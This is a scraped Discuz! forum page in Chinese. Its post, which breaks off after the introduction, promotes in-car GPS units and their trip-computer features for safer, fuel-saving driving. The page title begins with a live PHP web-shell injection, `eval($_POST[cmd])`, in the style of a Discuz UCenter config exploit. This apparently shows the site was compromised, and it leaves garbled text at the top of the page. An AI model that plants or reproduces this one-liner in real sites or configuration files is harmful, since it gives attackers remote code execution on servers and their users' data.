');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 節油省錢養成駕車好習慣 車載GPS幫您忙 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

節油省錢養成駕車好習慣 車載GPS幫您忙

車載PND產品最主要的實際功能就是通過內置地圖幫助用戶指路導航,此外越來越多的附加娛樂也融入其中,例如CMMB接收模塊、RMVB直讀、無線藍牙等均已成為車載導航設備的標配。作為車載導航設備的用戶我們往往忽視了車載機內置的一個很實用的隨記功能,那就是車載PND內置的行車電腦。






    行車電腦雖然只是一個普通的軟件程序,但在實際應用中卻能發揮出意想不到的效果,測速軟件可以讓您瞭解車輛的實際行駛速度結合預警軟件可以避免違章的發生,節能助手能幫助您改掉不好的駕車習慣,從而達到既能節省油費又能增強環保意識的作用,電子羅盤可以令您輕鬆掌控方向從而增強對於陌生道路的駕馭感。車載PND內置的行車電腦也是比較容易被用戶所忽視的一部分,接下來我們通過實際測試模擬各種行車環境來感受一下行車電腦的實力。
返回列表